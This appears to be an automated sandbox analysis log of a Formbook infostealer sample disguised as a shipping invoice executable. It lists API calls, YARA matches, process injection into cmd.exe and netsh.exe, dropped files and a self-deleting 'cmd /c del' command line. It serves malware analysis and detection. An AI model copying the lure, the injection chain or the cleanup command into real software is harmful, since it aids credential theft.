          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B7AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B796D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B7A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B7A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B7B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B7A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B79B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_008054E0 NtDelayExecution,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0080318C NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037496D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037495D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0374A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037499D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0374B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037498F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037498A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0374A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0374A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037497A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749560 NtWriteFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0374AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03749520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037495F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F782B0 NtClose,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F78230 NtReadFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F78180 NtCreateFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F782DA NtClose,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F782AC NtClose,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7817A NtCreateFile,
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_00406943
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_0040711A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10001BB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10004700
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10006325
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00401030
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041CB17
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041CB1A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041B466
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00408C2B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00408C30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00402D87
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00402D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00402FB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B30D20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C01D55
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B56E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B4B090
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF1002
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B54120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B3F900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B6EBB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AB40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037ACB4F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D2B28
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037B23E3
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C03DA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373ABD8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CDBD2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373EBB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373138B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B236
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037BFA2B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D22AE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03724120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370F900
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A830
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037DE824
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1002
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D28EC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D20A8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371B090
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D1FF1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037DDFCE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03726E30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CD616
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D2EF7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D1D55
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03700D20
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D2D07
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371D5E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D25DD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CD466
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371841F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7CB17
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7CB1A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F62FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7B466
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F68C30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F68C2B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F62D90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F62D87
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 0370B150 appears 136 times
          Source: Shipping INVOICE-BL Shipment..exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Shipping INVOICE-BL Shipment..exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: DevCfgUI.dll.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: DevCfgUI.dll.0.drStatic PE information: No import functions for PE file found
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: sfc.dll
          Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/27@11/6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_100019C0 Cremaster,CertOpenSystemStoreA,EqualSid,FlushFileBuffers,GetWindowThreadProcessId,ReleaseSemaphore,LoadBitmapA,ScrollDC,SetScrollPos,HeapDestroy,ReadFile,
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_00404686 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeCode function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Roaming\pkgsJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5732:120:WilError_01
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\nse53A6.tmpJump to behavior
          Source: Shipping INVOICE-BL Shipment..exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Prehnite,Lychnises
          Source: Shipping INVOICE-BL Shipment..exeVirustotal: Detection: 27%
          Source: Shipping INVOICE-BL Shipment..exeReversingLabs: Detection: 44%
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile read: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe 'C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Prehnite,Lychnises
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Prehnite,Lychnises
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: Shipping INVOICE-BL Shipment..exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: vjscsvr.pdb source: nse53A7.tmp.0.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.703909995.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: f:\binaries.x86ret\bin\i386\VC7\VCPackages\1033\rcxdtiui.pdb source: rcxditui.dll.0.dr
          Source: Binary string: netsh.pdb source: cmd.exe, 00000002.00000002.737580402.0000000004990000.00000040.00000001.sdmp
          Source: Binary string: f:\RTM\vsproject\xmake\Framework\objr\i386\Microsoft.Build.Framework.pdb$ source: MSBuildFramework.dll.0.dr
          Source: Binary string: netsh.pdbGCTL source: cmd.exe, 00000002.00000002.737580402.0000000004990000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, netsh.exe, 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: netsh.exe, 00000009.00000002.914476844.00000000032B5000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: cmd.exe, netsh.exe
          Source: Binary string: f:\RTM\vsproject\xmake\Framework\objr\i386\Microsoft.Build.Framework.pdb source: MSBuildFramework.dll.0.dr
          Source: Binary string: y:\components\cpp\ufls\crtowords\es\UniRelease\crtowords_es.pdbQ" source: nse53A7.tmp.0.dr
          Source: Binary string: f:\binaries.x86ret\bin\i386\VC7\VCPackages\1033\dbsvcui.pdb source: nse53A7.tmp.0.dr
          Source: Binary string: cmd.pdb source: netsh.exe, 00000009.00000002.914476844.00000000032B5000.00000004.00000020.sdmp
          Source: Binary string: MakeCert.pdb source: makecert.exe.0.dr
          Source: Binary string: guidgen.pdb source: guidgen.exe.0.dr
          Source: Binary string: y:\components\cpp\ufls\crtowords\es\UniRelease\crtowords_es.pdb source: nse53A7.tmp.0.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.703909995.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_1000734B LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_100046E5 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041C952 push es; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041B375 push eax; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041B3C2 push eax; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041B3CB push eax; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00409412 push ss; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041B42C push eax; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00414D93 push 5C0B9774h; iretd
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00414EE9 push ebp; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B8D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0375D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7B3C2 push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7B3CB push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7B375 push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7C952 push es; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F74EE9 push ebp; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F7B42C push eax; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F69412 push ss; ret
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_02F74D93 push 5C0B9774h; iretd
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\medium\listadmin\glance_config\eDbgJitUI.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exeJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\dbsvcui.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Roaming\panel\box\xbox\msvsotbcct.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\Prehnite.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Roaming\pkgs\rcxditui.dllJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Roaming\pkgs\vjscsvr.exeJump to dropped file
          Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exeFile created: C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exeJump to dropped file

